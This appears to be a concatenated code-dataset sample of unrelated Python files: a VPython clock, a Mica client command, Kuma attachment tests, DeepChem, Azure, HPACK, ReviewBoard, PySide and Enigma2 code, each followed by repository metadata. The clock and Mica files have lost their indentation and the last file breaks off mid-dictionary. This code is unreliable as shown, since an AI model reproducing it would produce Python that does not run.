small_tick_color=color of small ticks (at 1,2,4,5,7,8,10,11 hours) (default: color.blue)
minute_dot_color=color of minute dots between ticks (default: (0.4,0.4,0.4))
number_color=color of hour numbers (default: color.black)
hour_pointer_color=color of hour pointer (default: color.red)
minute_pointer_color=color of hour pointer (default: color.blue)
second_pointer_color=color of hour pointer (default: (0.4,0.4,0.4))
"""
def __init__(self, *args, **kw):
"""Create primitives of clock"""
Base.__init__(self, {
'frame': None,
'pointers': 'hms',
'ring_color': color.yellow,
'back_color': color.white,
'big_tick_color': color.red,
'small_tick_color': color.blue,
'minute_dot_color': (0.4, 0.4, 0.4),
'number_color': color.black,
'hour_pointer_color': color.red,
'minute_pointer_color': color.blue,
'second_pointer_color': (0.4, 0.4, 0.4)}, *args, **kw)
if not self.frame:
self.frame = frame(*self.args, **self.kw)
pl = list(self.pointers)
hp, mp, sp = 'h' in pl, 'm' in pl, 's' in pl
ring(frame=self.frame, axis=(0, 0, 1), radius=1,
thickness=0.05, color=self.ring_color)
cylinder(frame=self.frame, pos=(0, 0, -0.03),
axis=(0, 0, 0.02), radius=1, color=self.back_color)
for i in range(60):
a = pi * i / 30.0
if i % 5 == 0:
j = i / 5
if j % 3:
c, h = self.small_tick_color, 0.06
else:
c, h = self.big_tick_color, 0.12
box(frame=self.frame, pos=(0.99, 0, 0), length=0.14, height=h,
width=0.12, color=c).rotate(angle=a, axis=(0, 0, 1), origin=(0, 0, 0))
t = text(pos=(0.8 * sin(a), 0.8 * cos(a) - 0.06, 0), axis=(1, 0, 0), height=0.12,
string=str(j + 12 * (not j)), color=self.number_color, depth=0.02, justify='center')
for o in t.objects:
o.frame.frame = self.frame
else:
sphere(frame=self.frame, pos=(1, 0, 0.05), radius=0.01, color=self.minute_dot_color).rotate(
angle=a, axis=(0, 0, 1), origin=(0, 0, 0))
if hp:
self.hf = hf = frame(frame=self.frame)
cylinder(frame=hf, pos=(0, 0, -0.01), axis=(0, 0, 0.02),
radius=0.08, color=self.hour_pointer_color)
box(frame=hf, pos=(0.25, 0, 0.005), axis=(0.5, 0, 0),
height=0.04, width=0.01, color=self.hour_pointer_color)
else:
self.hf = None
if mp:
self.mf = mf = frame(frame=self.frame)
cylinder(frame=mf, pos=(0, 0, 0.01), axis=(0, 0, 0.02),
radius=0.06, color=self.minute_pointer_color)
box(frame=mf, pos=(0.35, 0, 0.025), axis=(0.7, 0, 0),
height=0.03, width=0.01, color=self.minute_pointer_color)
else:
self.mf = None
if sp:
self.sf = sf = frame(frame=self.frame)
cylinder(frame=sf, pos=(0, 0, 0.03), axis=(0, 0, 0.02),
radius=0.04, color=self.second_pointer_color)
box(frame=sf, pos=(0.4, 0, 0.045), axis=(0.8, 0, 0),
height=0.02, width=0.01, color=self.second_pointer_color)
else:
self.sf = None
self.update()
def update(self, unixtime=None, gmt=0):
"""Update clock to specific unix timestamp
or current local time if not specified or None,
use GMT time if gmt is true"""
if unixtime == None:
unixtime = time()
if gmt:
tm = gmtime(unixtime)
else:
tm = localtime(unixtime)
h, m, s = tm[3:6]
ts = h * 3600 + m * 60 + s
aml = [2.0 / 86400.0, 1.0 / 3600.0, 1.0 / 60.0]
for am, f in zip(aml, [self.hf, self.mf, self.sf]):
if not f:
continue
a = 2 * pi * ts * am
f.axis = ax = rotate((0, 1, 0), angle=-a, axis=(0, 0, 1))
f.up = cross(vector(0, 0, 1), ax)
def TestClocks():
scene.title = 'cx_clock test'
tl = [('analog', 0, 0, -pi / 6)]
clk = []
for t, x, y, r in tl:
frm = frame(pos=(x, y, -0.3), axis=(1, 0, 0),
up=rotate((0, 1, 0), axis=(1, 0, 0), angle=r), visible=0)
clk.append(Clock3D(t, frame=frm))
while 1:
rate(1)
for c in clk:
c.update()
c.frame.visible = 1
if __name__ == '__main__':
TestClocks()
os.system("pause")
|
NicovincX2/Python-3.5
|
Divers/draw_a_clock_vpython.py
|
Python
|
gpl-3.0
| 6,444 | 0.001552 |
"""
Apply access on a harmonization dataset.
"""
import sys
import mica.core
import mica.access
def add_arguments(parser):
"""
Add command specific options
"""
mica.access.add_permission_arguments(parser, True)
parser.add_argument('id', help='Harmonization dataset ID')
def do_command(args):
"""
Execute access command
"""
# Build and send requests
try:
mica.access.validate_args(args)
request = mica.core.MicaClient.build(mica.core.MicaClient.LoginInfo.parse(args)).new_request()
if args.verbose:
request.verbose()
# send request
if args.delete:
request.delete()
else:
request.put()
try:
response = request.resource(mica.access.do_ws(args, ['draft','harmonization-dataset', args.id, 'accesses'])).send()
except Exception, e:
print Exception, e
# format response
if response.code != 204:
print response.content
except Exception, e:
print e
sys.exit(2)
except pycurl.error, error:
errno, errstr = error
print >> sys.stderr, 'An error occurred: ', errstr
sys.exit(2)
|
apruden/mica2
|
mica-python-client/src/main/python/mica/access_harmonization_dataset.py
|
Python
|
gpl-3.0
| 1,215 | 0.004115 |
from cloudify.workflows import ctx, parameters
ctx.logger.info(parameters.node_id)
instance = [n for n in ctx.node_instances
if n.node_id == parameters.node_id][0]
for relationship in instance.relationships:
relationship.execute_source_operation('custom_lifecycle.custom_operation')
|
cloudify-cosmo/cloudify-manager
|
tests/integration_tests/resources/dsl/deployment_update/modify_relationship_operation/modification/custom_workflow.py
|
Python
|
apache-2.0
| 304 | 0 |
import datetime
import json
from constance.test import override_config
from django.conf import settings
from django.core.files.base import ContentFile
from django.db import transaction
from django.utils.http import parse_http_date_safe
from kuma.core.urlresolvers import reverse
from kuma.users.tests import UserTestCase
from kuma.wiki.models import DocumentAttachment
from kuma.wiki.tests import WikiTestCase, document, revision
from ..models import Attachment, AttachmentRevision
from . import make_test_file
@override_config(WIKI_ATTACHMENT_ALLOWED_TYPES='text/plain')
class AttachmentViewTests(UserTestCase, WikiTestCase):
def setUp(self):
super(AttachmentViewTests, self).setUp()
self.client.login(username='admin', password='testpass')
self.revision = revision(save=True)
self.document = self.revision.document
self.files_url = reverse('attachments.edit_attachment',
kwargs={'document_path': self.document.slug},
locale='en-US')
@transaction.atomic
def _post_attachment(self):
file_for_upload = make_test_file(
content='A test file uploaded into kuma.')
post_data = {
'title': 'Test uploaded file',
'description': 'A test file uploaded into kuma.',
'comment': 'Initial upload',
'file': file_for_upload,
}
response = self.client.post(self.files_url,
data=post_data)
return response
def test_legacy_redirect(self):
test_user = self.user_model.objects.get(username='testuser2')
test_file_content = 'Meh meh I am a test file.'
test_files = (
{'file_id': 97, 'filename': 'Canvas_rect.png',
'title': 'Canvas rect'},
{'file_id': 107, 'filename': 'Canvas_smiley.png',
'title': 'Canvas smiley'},
{'file_id': 86, 'filename': 'Canvas_lineTo.png',
'title': 'Canvas lineTo'},
{'file_id': 55, 'filename': 'Canvas_arc.png',
'title': 'Canvas arc'},
)
for test_file in test_files:
attachment = Attachment(
title=test_file['title'],
mindtouch_attachment_id=test_file['file_id'],
)
attachment.save()
now = datetime.datetime.now()
revision = AttachmentRevision(
attachment=attachment,
mime_type='text/plain',
title=test_file['title'],
description='',
created=now,
is_approved=True)
revision.creator = test_user
revision.file.save(test_file['filename'],
ContentFile(test_file_content))
revision.make_current()
mindtouch_url = reverse('attachments.mindtouch_file_redirect',
args=(),
kwargs={'file_id': test_file['file_id'],
'filename': test_file['filename']})
response = self.client.get(mindtouch_url)
self.assertRedirects(response, attachment.get_file_url(),
status_code=301,
fetch_redirect_response=False)
def test_get_request(self):
response = self.client.get(self.files_url, follow=True)
self.assertRedirects(response, self.document.get_edit_url())
def test_edit_attachment(self):
response = self._post_attachment()
self.assertRedirects(response, self.document.get_edit_url())
attachment = Attachment.objects.get(title='Test uploaded file')
rev = attachment.current_revision
self.assertEqual(rev.creator.username, 'admin')
self.assertEqual(rev.description, 'A test file uploaded into kuma.')
self.assertEqual(rev.comment, 'Initial upload')
self.assertTrue(rev.is_approved)
def test_attachment_raw_requires_attachment_host(self):
response = self._post_attachment()
attachment = Attachment.objects.get(title='Test uploaded file')
url = attachment.get_file_url()
response = self.client.get(url)
self.assertRedirects(response, url,
fetch_redirect_response=False,
status_code=301)
response = self.client.get(url, HTTP_HOST=settings.ATTACHMENT_HOST)
self.assertTrue(response.streaming)
self.assertEqual(response['x-frame-options'],
'ALLOW-FROM %s' % settings.DOMAIN)
self.assertEqual(response.status_code, 200)
self.assertIn('Last-Modified', response)
self.assertNotIn('1970', response['Last-Modified'])
self.assertIn('GMT', response['Last-Modified'])
self.assertIsNotNone(parse_http_date_safe(response['Last-Modified']))
def test_get_previous(self):
"""
AttachmentRevision.get_previous() should return this revisions's
files's most recent approved revision."""
test_user = self.user_model.objects.get(username='testuser2')
attachment = Attachment(title='Test attachment for get_previous')
attachment.save()
revision1 = AttachmentRevision(
attachment=attachment,
mime_type='text/plain',
title=attachment.title,
description='',
comment='Initial revision.',
created=datetime.datetime.now() - datetime.timedelta(seconds=30),
creator=test_user,
is_approved=True)
revision1.file.save('get_previous_test_file.txt',
ContentFile('I am a test file for get_previous'))
revision1.save()
revision1.make_current()
revision2 = AttachmentRevision(
attachment=attachment,
mime_type='text/plain',
title=attachment.title,
description='',
comment='First edit..',
created=datetime.datetime.now(),
creator=test_user,
is_approved=True)
revision2.file.save('get_previous_test_file.txt',
ContentFile('I am a test file for get_previous'))
revision2.save()
revision2.make_current()
self.assertEqual(revision1, revision2.get_previous())
@override_config(WIKI_ATTACHMENT_ALLOWED_TYPES='application/x-super-weird')
def test_mime_type_filtering(self):
"""
Don't allow uploads outside of the explicitly-permitted
mime-types.
"""
_file = make_test_file(content='plain and text', suffix='.txt')
post_data = {
'title': 'Test disallowed file type',
'description': 'A file kuma should disallow on type.',
'comment': 'Initial upload',
'file': _file,
}
response = self.client.post(self.files_url, data=post_data)
self.assertEqual(response.status_code, 200)
self.assertContains(response, 'Files of this type are not permitted.')
_file.close()
def test_intermediate(self):
"""
Test that the intermediate DocumentAttachment gets created
correctly when adding an Attachment with a document_id.
"""
doc = document(locale='en-US',
slug='attachment-test-intermediate',
save=True)
revision(document=doc, is_approved=True, save=True)
file_for_upload = make_test_file(
content='A file for testing intermediate attachment model.')
post_data = {
'title': 'Intermediate test file',
'description': 'Intermediate test file',
'comment': 'Initial upload',
'file': file_for_upload,
}
files_url = reverse('attachments.edit_attachment',
kwargs={'document_path': doc.slug},
locale='en-US')
response = self.client.post(files_url, data=post_data)
self.assertEqual(response.status_code, 302)
self.assertEqual(doc.files.count(), 1)
intermediates = DocumentAttachment.objects.filter(document__pk=doc.id)
self.assertEqual(intermediates.count(), 1)
intermediate = intermediates[0]
self.assertEqual(intermediate.attached_by.username, 'admin')
self.assertEqual(intermediate.name,
file_for_upload.name.split('/')[-1])
def test_feed(self):
test_user = self.user_model.objects.get(username='testuser2')
attachment = Attachment(title='Test attachment for get_previous')
attachment.save()
revision = AttachmentRevision(
attachment=attachment,
mime_type='text/plain',
title=attachment.title,
description='',
comment='Initial revision.',
created=datetime.datetime.now() - datetime.timedelta(seconds=30),
creator=test_user,
is_approved=True)
revision.file.save('get_previous_test_file.txt',
ContentFile('I am a test file for get_previous'))
revision.save()
revision.make_current()
feed_url = reverse('attachments.feeds.recent_files', locale='en-US',
args=(), kwargs={'format': 'json'})
response = self.client.get(feed_url)
data = json.loads(response.content)
self.assertEqual(len(data), 1)
self.assertEqual(data[0]['title'], revision.title)
self.assertEqual(data[0]['link'], revision.attachment.get_file_url())
self.assertEqual(data[0]['author_name'], test_user.username)
|
safwanrahman/kuma
|
kuma/attachments/tests/test_views.py
|
Python
|
mpl-2.0
| 9,771 | 0 |
"""
Script that trains graph-conv models on Tox21 dataset.
"""
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import numpy as np
import json
np.random.seed(123)
import tensorflow as tf
tf.set_random_seed(123)
import deepchem as dc
from deepchem.molnet import load_tox21
from deepchem.models.tensorgraph.models.graph_models import PetroskiSuchModel
model_dir = "/tmp/graph_conv"
# Load Tox21 dataset
tox21_tasks, tox21_datasets, transformers = load_tox21(
featurizer='AdjacencyConv')
train_dataset, valid_dataset, test_dataset = tox21_datasets
print(train_dataset.data_dir)
print(valid_dataset.data_dir)
# Fit models
metric = dc.metrics.Metric(
dc.metrics.roc_auc_score, np.mean, mode="classification")
# Batch size of models
batch_size = 128
model = PetroskiSuchModel(
len(tox21_tasks), batch_size=batch_size, mode='classification')
model.fit(train_dataset, nb_epoch=10)
print("Evaluating model")
train_scores = model.evaluate(train_dataset, [metric], transformers)
valid_scores = model.evaluate(valid_dataset, [metric], transformers)
print("Train scores")
print(train_scores)
print("Validation scores")
print(valid_scores)
|
Agent007/deepchem
|
examples/tox21/tox21_graphcnn.py
|
Python
|
mit
| 1,211 | 0.003303 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class Domain(Model):
"""Active Directory Domain information.
Variables are only populated by the server, and will be ignored when
sending a request.
All required parameters must be populated in order to send to Azure.
:param additional_properties: Unmatched properties from the message are
deserialized this collection
:type additional_properties: dict[str, object]
:ivar authentication_type: the type of the authentication into the domain.
:vartype authentication_type: str
:ivar is_default: if this is the default domain in the tenant.
:vartype is_default: bool
:ivar is_verified: if this domain's ownership is verified.
:vartype is_verified: bool
:param name: Required. the domain name.
:type name: str
"""
_validation = {
'authentication_type': {'readonly': True},
'is_default': {'readonly': True},
'is_verified': {'readonly': True},
'name': {'required': True},
}
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'authentication_type': {'key': 'authenticationType', 'type': 'str'},
'is_default': {'key': 'isDefault', 'type': 'bool'},
'is_verified': {'key': 'isVerified', 'type': 'bool'},
'name': {'key': 'name', 'type': 'str'},
}
def __init__(self, *, name: str, additional_properties=None, **kwargs) -> None:
super(Domain, self).__init__(**kwargs)
self.additional_properties = additional_properties
self.authentication_type = None
self.is_default = None
self.is_verified = None
self.name = name
|
Azure/azure-sdk-for-python
|
sdk/graphrbac/azure-graphrbac/azure/graphrbac/models/domain_py3.py
|
Python
|
mit
| 2,154 | 0.000464 |
# -*- coding: utf-8 -*-
"""
This module defines substantial HPACK integration tests. These can take a very
long time to run, so they're outside the main test suite, but they need to be
run before every change to HPACK.
"""
from hpack.hpack import Decoder, Encoder
from binascii import unhexlify
from pytest import skip
class TestHPACKDecoderIntegration(object):
def test_can_decode_a_story(self, story):
d = Decoder()
# We test against draft 9 of the HPACK spec.
if story['draft'] != 9:
skip("We test against draft 9, not draft %d" % story['draft'])
for case in story['cases']:
try:
d.header_table_size = case['header_table_size']
except KeyError:
pass
decoded_headers = d.decode(unhexlify(case['wire']))
# The correct headers are a list of dicts, which is annoying.
correct_headers = [(item[0], item[1]) for header in case['headers'] for item in header.items()]
correct_headers = correct_headers
assert correct_headers == decoded_headers
def test_can_encode_a_story_no_huffman(self, raw_story):
d = Decoder()
e = Encoder()
for case in raw_story['cases']:
# The input headers are a list of dicts, which is annoying.
input_headers = [(item[0], item[1]) for header in case['headers'] for item in header.items()]
encoded = e.encode(input_headers, huffman=False)
decoded_headers = d.decode(encoded)
assert input_headers == decoded_headers
def test_can_encode_a_story_with_huffman(self, raw_story):
d = Decoder()
e = Encoder()
for case in raw_story['cases']:
# The input headers are a list of dicts, which is annoying.
input_headers = [(item[0], item[1]) for header in case['headers'] for item in header.items()]
encoded = e.encode(input_headers, huffman=True)
decoded_headers = d.decode(encoded)
assert input_headers == decoded_headers
|
jimcarreer/hpack
|
test/test_hpack_integration.py
|
Python
|
mit
| 2,084 | 0.001919 |
#!/usr/bin/env python
#
# Setup script for Review Board.
#
# A big thanks to Django project for some of the fixes used in here for
# MacOS X and data files installation.
import os
import shutil
import sys
from ez_setup import use_setuptools
use_setuptools()
from setuptools import setup, find_packages
from setuptools.command.build_py import build_py
from distutils.command.install_data import install_data
from distutils.command.install import INSTALL_SCHEMES
from reviewboard import get_package_version, is_release, VERSION
# Make sure we're actually in the directory containing setup.py.
root_dir = os.path.dirname(__file__)
if root_dir != "":
os.chdir(root_dir)
# Tell distutils to put the data_files in platform-specific installation
# locations. See here for an explanation:
# http://groups.google.com/group/comp.lang.python/browse_thread/thread/35ec7b2fed36eaec/2105ee4d9e8042cb
for scheme in INSTALL_SCHEMES.values():
scheme['data'] = scheme['purelib']
class osx_install_data(install_data):
# On MacOS, the platform-specific lib dir is
# /System/Library/Framework/Python/.../
# which is wrong. Python 2.5 supplied with MacOS 10.5 has an
# Apple-specific fix for this in distutils.command.install_data#306. It
# fixes install_lib but not install_data, which is why we roll our own
# install_data class.
def finalize_options(self):
# By the time finalize_options is called, install.install_lib is
# set to the fixed directory, so we set the installdir to install_lib.
# The # install_data class uses ('install_data', 'install_dir') instead.
self.set_undefined_options('install', ('install_lib', 'install_dir'))
install_data.finalize_options(self)
if sys.platform == "darwin":
cmdclasses = {'install_data': osx_install_data}
else:
cmdclasses = {'install_data': install_data}
PACKAGE_NAME = 'ReviewBoard'
if is_release():
download_url = 'http://downloads.reviewboard.org/releases/%s/%s.%s/' % \
(PACKAGE_NAME, VERSION[0], VERSION[1])
else:
download_url = 'http://downloads.reviewboard.org/nightlies/'
# Build the reviewboard package.
setup(name=PACKAGE_NAME,
version=get_package_version(),
license="MIT",
description="Review Board, a web-based code review tool",
url="http://www.reviewboard.org/",
download_url=download_url,
author="The Review Board Project",
author_email="reviewboard@googlegroups.com",
maintainer="Christian Hammond",
maintainer_email="chipx86@chipx86.com",
packages=find_packages(),
entry_points = {
'console_scripts': [
'rb-site = reviewboard.cmdline.rbsite:main',
],
'reviewboard.scmtools': [
'bzr = reviewboard.scmtools.bzr:BZRTool',
'clearcase = reviewboard.scmtools.clearcase:ClearCaseTool',
'cvs = reviewboard.scmtools.cvs:CVSTool',
'git = reviewboard.scmtools.git:GitTool',
'hg = reviewboard.scmtools.hg:HgTool',
'perforce = reviewboard.scmtools.perforce:PerforceTool',
'svn = reviewboard.scmtools.svn:SVNTool',
],
},
cmdclass=cmdclasses,
install_requires=[
'Django>=1.1.1',
'django_evolution',
'Djblets>=0.5.5',
'Pygments>=0.10',
'flup',
'pytz'
],
dependency_links = [
"http://downloads.reviewboard.org/mirror/",
download_url,
],
include_package_data=True,
zip_safe=False,
classifiers=[
"Development Status :: 5 - Production/Stable",
"Environment :: Web Environment",
"Framework :: Django",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Natural Language :: English",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Topic :: Software Development",
"Topic :: Software Development :: Quality Assurance",
]
)
|
asutherland/opc-reviewboard
|
setup.py
|
Python
|
mit
| 4,082 | 0.002695 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
from PySide2.QtCore import *
from PySide2.QtGui import *
from PySide2.QtWidgets import *
class FDragRowsTableWidget(QTableWidget):
def __init__(self, rows=0, cloumns=2, parent=None):
super(FDragRowsTableWidget, self).__init__(rows, cloumns, parent)
self.parent = parent
self.setEditTriggers(self.NoEditTriggers)
self.setDragEnabled(True)
self.setAcceptDrops(True)
self.viewport().setAcceptDrops(True)
self.setDragDropOverwriteMode(False)
self.setDropIndicatorShown(True)
self.setSelectionMode(QAbstractItemView.SingleSelection)
self.setSelectionBehavior(QAbstractItemView.SelectRows)
self.setDragDropMode(QAbstractItemView.InternalMove)
headerview = QHeaderView(Qt.Horizontal, self)
self.setHorizontalHeader(headerview)
self.setFocusPolicy(Qt.NoFocus)
self.verticalHeader().setVisible(False)
def dropEvent(self, event):
if event.source() == self and \
(event.dropAction() == Qt.MoveAction or
self.dragDropMode() == QAbstractItemView.InternalMove):
success, row, col, topIndex = self.dropOn(event)
if success:
selRows = self.getSelectedRowsFast()
top = selRows[0]
# print 'top is %d'%top
dropRow = row
if dropRow == -1:
dropRow = self.rowCount()
# print 'dropRow is %d'%dropRow
offset = dropRow - top
# print 'offset is %d'%offset
for i, row in enumerate(selRows):
r = row + offset
if r > self.rowCount() or r < 0:
r = 0
self.insertRow(r)
# print 'inserting row at %d'%r
selRows = self.getSelectedRowsFast()
# print 'selected rows: %s'%selRows
top = selRows[0]
# print 'top is %d'%top
offset = dropRow - top
# print 'offset is %d'%offset
for i, row in enumerate(selRows):
r = row + offset
if r > self.rowCount() or r < 0:
r = 0
for j in range(self.columnCount()):
# print 'source is (%d, %d)'%(row, j)
# print 'item text: %s'%self.item(row,j).text()
source = QTableWidgetItem(self.item(row, j))
# print 'dest is (%d, %d)'%(r,j)
self.setItem(r, j, source)
# Why does this NOT need to be here?
# for row in reversed(selRows):
# self.removeRow(row)
event.accept()
else:
QTableView.dropEvent(event)
def getSelectedRowsFast(self):
selRows = []
for item in self.selectedItems():
if item.row() not in selRows:
selRows.append(item.row())
return selRows
def droppingOnItself(self, event, index):
dropAction = event.dropAction()
if self.dragDropMode() == QAbstractItemView.InternalMove:
dropAction = Qt.MoveAction
if event.source() == self and \
event.possibleActions() & Qt.MoveAction and \
dropAction == Qt.MoveAction:
selectedIndexes = self.selectedIndexes()
child = index
while child.isValid() and child != self.rootIndex():
if child in selectedIndexes:
return True
child = child.parent()
return False
def dropOn(self, event):
if event.isAccepted():
return False, None, None, None
index = QModelIndex()
row = -1
col = -1
if self.viewport().rect().contains(event.pos()):
index = self.indexAt(event.pos())
if not index.isValid() or \
not self.visualRect(index).contains(event.pos()):
index = self.rootIndex()
if self.model().supportedDropActions() & event.dropAction():
if index != self.rootIndex():
dropIndicatorPosition = self.position(
event.pos(), self.visualRect(index), index)
if dropIndicatorPosition == QAbstractItemView.AboveItem:
row = index.row()
col = index.column()
# index = index.parent()
elif dropIndicatorPosition == QAbstractItemView.BelowItem:
row = index.row() + 1
col = index.column()
# index = index.parent()
else:
row = index.row()
col = index.column()
if not self.droppingOnItself(event, index):
# print 'row is %d'%row
# print 'col is %d'%col
return True, row, col, index
return False, None, None, None
def position(self, pos, rect, index):
r = QAbstractItemView.OnViewport
margin = 2
if pos.y() - rect.top() < margin:
r = QAbstractItemView.AboveItem
elif rect.bottom() - pos.y() < margin:
r = QAbstractItemView.BelowItem
elif rect.contains(pos, True):
r = QAbstractItemView.OnItem
if r == QAbstractItemView.OnItem and \
not (self.model().flags(index) & Qt.ItemIsDropEnabled):
r = QAbstractItemView.AboveItem if pos.y() < rect.center(
).y() else QAbstractItemView.BelowItem
return r
class FDetailShow(QTextEdit):
def __init__(self, jsondata, parent=None):
super(FDetailShow, self).__init__(parent)
self.parent = parent
self.setText(jsondata)
self.setReadOnly(True)
self.installEventFilter(self)
self.setFocus()
def mousePressEvent(self, event):
if event.button() == Qt.RightButton:
pass
else:
super(FDetailShow, self).mousePressEvent(event)
class FTableItemDetailWidget(QFrame):
def __init__(self, jsondata, row, column, parent=None):
super(FTableItemDetailWidget, self).__init__(parent)
self.parent = parent
self.startX = 0
self.row = row
for i in range(column):
self.startX += self.parent.columnWidth(i)
self.setWindowFlags(Qt.Popup)
self.setFixedSize(self.parent.columnWidth(3), 220)
detailShow = FDetailShow(jsondata, self)
detailShow.setFixedSize(self.width(), 200)
self.titleLabel = QLabel("Data", self)
self.titleLabel.setAlignment(Qt.AlignCenter)
self.titleLabel.setObjectName("FTableItemDetailWidgetTitlebar")
self.titleLabel.setFixedSize(self.parent.columnWidth(3), 20)
mainlayout = QVBoxLayout()
mainlayout.addWidget(self.titleLabel)
mainlayout.addWidget(detailShow)
mainlayout.setSpacing(0)
mainlayout.setContentsMargins(0, 0, 0, 0)
self.setLayout(mainlayout)
self.installEventFilter(self)
self.show()
def eventFilter(self, obj, event):
if event.type() == QEvent.MouseButtonPress:
self.close()
return True
else:
return super(FTableItemDetailWidget, self).eventFilter(obj, event)
def showDetail(self):
self.jsonshowPosX = self.parent.mapToGlobal(QPoint(self.startX, 0)).x()
self.jsonshowPosY = self.parent.mapToGlobal(QPoint(self.startX, self.parent.rowViewportPosition(self.row))).y()\
- self.height() + self.parent.horizontalHeader().height()
self.move(self.jsonshowPosX, self.jsonshowPosY)
self.show()
def resizeEvent(self, event):
self.titleLabel.setFixedWidth(self.width())
|
dragondjf/PFramer
|
qframer/ftablewidget.py
|
Python
|
gpl-3.0
| 7,960 | 0.000126 |
from Screen import Screen
from ServiceScan import ServiceScan
from Components.config import config, ConfigSubsection, ConfigSelection, ConfigYesNo, ConfigInteger, getConfigListEntry, ConfigSlider, ConfigEnableDisable
from Components.ActionMap import NumberActionMap, ActionMap
from Components.ConfigList import ConfigListScreen
from Components.NimManager import nimmanager, getConfigSatlist
from Components.Label import Label
from Components.Sources.StaticText import StaticText
from Tools.HardwareInfo import HardwareInfo
from Screens.InfoBar import InfoBar
from Screens.MessageBox import MessageBox
from enigma import eTimer, eDVBFrontendParametersSatellite, eComponentScan, eDVBFrontendParametersTerrestrial, eDVBFrontendParametersCable, eConsoleAppContainer, eDVBResourceManager
from Components.Converter.ChannelNumbers import channelnumbers
from boxbranding import getMachineBrand
def buildTerTransponder(frequency,
inversion=2, bandwidth = 7000000, fechigh = 6, feclow = 6,
modulation = 2, transmission = 2, guard = 4,
hierarchy = 4, system = 0, plpid = 0):
# print "freq", frequency, "inv", inversion, "bw", bandwidth, "fech", fechigh, "fecl", feclow, "mod", modulation, "tm", transmission, "guard", guard, "hierarchy", hierarchy
parm = eDVBFrontendParametersTerrestrial()
parm.frequency = frequency
parm.inversion = inversion
parm.bandwidth = bandwidth
parm.code_rate_HP = fechigh
parm.code_rate_LP = feclow
parm.modulation = modulation
parm.transmission_mode = transmission
parm.guard_interval = guard
parm.hierarchy = hierarchy
parm.system = system
parm.plpid = plpid
return parm
def getInitialTransponderList(tlist, pos):
list = nimmanager.getTransponders(pos)
for x in list:
if x[0] == 0: #SAT
parm = eDVBFrontendParametersSatellite()
parm.frequency = x[1]
parm.symbol_rate = x[2]
parm.polarisation = x[3]
parm.fec = x[4]
parm.inversion = x[7]
parm.orbital_position = pos
parm.system = x[5]
parm.modulation = x[6]
parm.rolloff = x[8]
parm.pilot = x[9]
tlist.append(parm)
def getInitialCableTransponderList(tlist, nim):
list = nimmanager.getTranspondersCable(nim)
for x in list:
if x[0] == 1: #CABLE
parm = eDVBFrontendParametersCable()
parm.frequency = x[1]
parm.symbol_rate = x[2]
parm.modulation = x[3]
parm.fec_inner = x[4]
parm.inversion = x[5]
parm.system = x[6]
tlist.append(parm)
def getInitialTerrestrialTransponderList(tlist, region, skip_t2 = False):
list = nimmanager.getTranspondersTerrestrial(region)
#self.transponders[self.parsedTer].append((2,freq,bw,const,crh,crl,guard,transm,hierarchy,inv))
#def buildTerTransponder(frequency, inversion = 2, bandwidth = 3, fechigh = 6, feclow = 6,
#modulation = 2, transmission = 2, guard = 4, hierarchy = 4):
for x in list:
if x[0] == 2: #TERRESTRIAL
if skip_t2 and x[10] == eDVBFrontendParametersTerrestrial.System_DVB_T2:
# Should be searching on TerrestrialTransponderSearchSupport.
continue
parm = buildTerTransponder(x[1], x[9], x[2], x[4], x[5], x[3], x[7], x[6], x[8], x[10], x[11])
tlist.append(parm)
cable_bands = {
"DVBC_BAND_EU_VHF_I" : 1 << 0,
"DVBC_BAND_EU_MID" : 1 << 1,
"DVBC_BAND_EU_VHF_III" : 1 << 2,
"DVBC_BAND_EU_SUPER" : 1 << 3,
"DVBC_BAND_EU_HYPER" : 1 << 4,
"DVBC_BAND_EU_UHF_IV" : 1 << 5,
"DVBC_BAND_EU_UHF_V" : 1 << 6,
"DVBC_BAND_US_LO" : 1 << 7,
"DVBC_BAND_US_MID" : 1 << 8,
"DVBC_BAND_US_HI" : 1 << 9,
"DVBC_BAND_US_SUPER" : 1 << 10,
"DVBC_BAND_US_HYPER" : 1 << 11,
}
cable_autoscan_nimtype = {
'SSH108' : 'ssh108',
'TT3L10' : 'tt3l10',
'TURBO' : 'vuplus_turbo_c'
}
terrestrial_autoscan_nimtype = {
'SSH108' : 'ssh108_t2_scan',
'TT3L10' : 'tt3l10_t2_scan',
'TURBO' : 'vuplus_turbo_t'
}
def GetDeviceId(filter, nim_idx):
tuners={}
device_id = 0
socket_id = 0
for nim in nimmanager.nim_slots:
name_token = nim.description.split(' ')
name = name_token[-1][4:-1]
if name == filter:
if socket_id == nim_idx:
break
if device_id: device_id = 0
else: device_id = 1
socket_id += 1
return device_id
class CableTransponderSearchSupport:
# def setCableTransponderSearchResult(self, tlist):
# pass
# def cableTransponderSearchFinished(self):
# pass
def __init__(self):
pass
def tryGetRawFrontend(self, feid):
res_mgr = eDVBResourceManager.getInstance()
if res_mgr:
raw_channel = res_mgr.allocateRawChannel(self.feid)
if raw_channel:
frontend = raw_channel.getFrontend()
if frontend:
frontend.closeFrontend() # immediate close...
del frontend
del raw_channel
return True
return False
def cableTransponderSearchSessionClosed(self, *val):
print "cableTransponderSearchSessionClosed, val", val
self.cable_search_container.appClosed.remove(self.cableTransponderSearchClosed)
self.cable_search_container.dataAvail.remove(self.getCableTransponderData)
if val and len(val):
if val[0]:
self.setCableTransponderSearchResult(self.__tlist)
else:
self.cable_search_container.sendCtrlC()
self.setCableTransponderSearchResult(None)
self.cable_search_container = None
self.cable_search_session = None
self.__tlist = None
self.cableTransponderSearchFinished()
def cableTransponderSearchClosed(self, retval):
print "cableTransponderSearch finished", retval
self.cable_search_session.close(True)
def getCableTransponderData(self, str):
#prepend any remaining data from the previous call
str = self.remainingdata + str
#split in lines
lines = str.split('\n')
#'str' should end with '\n', so when splitting, the last line should be empty. If this is not the case, we received an incomplete line
if len(lines[-1]):
#remember this data for next time
self.remainingdata = lines[-1]
lines = lines[0:-1]
else:
self.remainingdata = ""
for line in lines:
data = line.split()
if len(data):
if data[0] == 'OK':
print str
parm = eDVBFrontendParametersCable()
qam = { "QAM16" : parm.Modulation_QAM16,
